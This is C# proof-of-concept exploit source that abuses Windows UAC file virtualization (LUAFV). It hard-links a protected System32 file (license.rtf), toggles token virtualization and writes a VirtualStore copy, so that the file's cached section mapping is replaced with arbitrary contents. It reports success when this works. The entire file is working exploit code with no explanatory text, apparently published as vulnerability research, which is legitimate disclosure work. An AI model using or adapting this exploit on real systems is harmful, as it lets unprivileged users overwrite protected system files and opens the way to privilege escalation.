﻿using NtApiDotNet;
using System;
using System.IO;
using System.Text;

namespace PoC_LUAFV_SectionTest
{
    class Program
    {
        static string CreateVirtualStoreFile(string target_path, byte[] data)
        {
            string base_path = target_path.Substring(target_path.IndexOf(':') + 2);
            string virtual_path = Path.Combine(
                Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
                "VirtualStore", base_path);
            Directory.CreateDirectory(Path.GetDirectoryName(virtual_path));
            File.WriteAllBytes(virtual_path, data);
            return virtual_path;
        }

        static void SetVirtualization(bool enable)
        {
            using (var token = NtToken.OpenProcessToken())
            {
                token.VirtualizationEnabled = enable;
            }
        }

        static long CreateHardlink(string source_file, string target_file)
        {
            using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(source_file), null, FileAccessRights.ReadAttributes))
            {
                file.CreateHardlink(NtFileUtils.DosFileNameToNt(target_file));
                return file.Length;
            }
        }

        static bool TestFileMapping(string source_file, byte[] data)
        {
            using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(source_file), null, 
                FileAccessRights.ReadData, FileShareMode.Read | FileShareMode.Delete, FileOpenOptions.NonDirectoryFile))
            {
                Console.WriteLine("Testing file {0}", file.FullPath);
                byte[] map_data = file.Read(data.Length, 0);
                for (int i = 0; i < data.Length; ++i)
                {
                    if (map_data[i] != data[i])
                    {
                        Console.WriteLine("Index {0} differs - {1:X} vs {2:X}", i, map_data[i], data[i]);
                        return false;
                    }
                }
            }
            return true;
        }

        static void ReplaceFileUsingVirtualization(string source_file)
        {
            Console.WriteLine("Using target file {0}", source_file);
            string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "luafv_" + Guid.NewGuid());
            Console.WriteLine("Base Path: {0}", base_path);
            Directory.CreateDirectory(base_path);
            string target_path = NtFileUtils.DosFileNameToNt(Path.Combine(base_path, "dummy.txt"));

            long size = CreateHardlink(source_file, target_path);

            byte[] data = new byte[size];
            byte[] contents = Encoding.ASCII.GetBytes("This is not the file you're looking for!");

            for (long i = 0; i < size; ++i)
            {
                if (i < contents.Length)
                {
                    data[i] = contents[i];
                }
                else
                {
                    data[i] = 0x20;
                }
            }

            SetVirtualization(true);
            using (var file = NtFile.Open(target_path, null, FileAccessRights.ReadData
                | FileAccessRights.WriteData,
                FileShareMode.Read | FileShareMode.Delete, FileOpenOptions.NonDirectoryFile))
            {
                SetVirtualization(false);
                CreateVirtualStoreFile(target_path, data);
                //Thread.Sleep(1000);
                //NtSystemInfo.ResolveObjectAddress(file);
                //Console.WriteLine("Object: {0:X}", file.Address);
                Console.WriteLine("{0} {1} {2}", file.FullPath, file.GrantedAccess, file.Length);
                using (var sect = NtSection.CreateReadOnlyDataSection(file))
                {
                    Console.WriteLine("Created section {0}", sect.Handle);
                    Console.WriteLine("Forcing virtualization {0}", file.CompressionFormat);
                    Console.WriteLine("{0} {1} {2}", file.FullPath, file.GrantedAccess, file.Length);
                    if (TestFileMapping(source_file, data))
                    {
                        Console.WriteLine("SUCCESS: File {0} replaced with arbitrary contents", source_file);
                    }
                    else
                    {
                        Console.WriteLine("ERROR: Mapping is different, try rebooting to clear the existing data section cache");
                    }
                    Console.ReadLine();
                }
            }
        }

        const string TARGET_FILE_NAME = "license.rtf";

        static void Main(string[] args)
        {
            try
            {
                ReplaceFileUsingVirtualization(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), TARGET_FILE_NAME));
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
                Console.ReadLine();
            }
        }
    }
}
